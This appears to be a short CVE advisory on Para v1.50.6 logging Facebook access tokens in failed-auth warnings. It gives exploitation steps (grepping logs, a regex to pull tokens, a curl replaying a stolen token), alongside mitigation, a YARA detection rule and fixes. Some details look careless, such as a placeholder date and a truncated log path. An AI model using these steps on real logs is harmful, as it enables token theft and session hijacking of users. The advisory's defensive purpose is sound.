How the CVE Works
The vulnerability occurs in `FacebookAuthFilter.java` when failed authentication attempts log sensitive Facebook access tokens. The code concatenates `PROFILE_URL` with the raw `accessToken` in a warning log statement (`logger.warn`). Since production systems retain WARN-level logs, attackers with log access can extract valid OAuth tokens, potentially hijacking user sessions or accessing private Facebook data. The exposure stems from logging the request URL under error conditions without sanitizing it.
DailyCVE Form
Platform: Para
Version: v1.50.6
Vulnerability: Info Leak
Severity: Medium
Date: 2023-XX-XX
Prediction: Patch by Q3 2024
What Undercode Say:
Exploitation:
1. Log Harvesting:
grep "Facebook auth request failed" /var/log/para-server.log
2. Token Extraction:
import re

logs = open("para-server.log").read()
tokens = re.findall(r"access_token=([^&\s]+)", logs)
3. Session Hijacking:
curl -H "Authorization: Bearer STOLEN_TOKEN" https://graph.facebook.com/me
Mitigation:
1. Code Fix:
// Replace the vulnerable line with:
logger.warn("Facebook auth failed: Profile fetch error", e);
2. Log Sanitization:
sed -i 's/access_token=[^&]*/access_token=REDACTED/g' /var/log/para-server.
3. Facebook Token Revocation:
curl -X DELETE "https://graph.facebook.com/v12.0/me/permissions?access_token=LEAKED_TOKEN"
Detection:
1. Audit Logs:
auditd -l | grep "para-server.token"
2. YARA Rule:
rule FB_Token_Leak {
    strings:
        $ = "access_token="
    condition:
        any of them
}
Permanent Fix:
- Disable debug logging in production (log4j2.xml): <Logger name="com.erudika.para" level="error"/>
- Rotate all exposed tokens via Facebook’s API.
Sources:
Reported By: github.com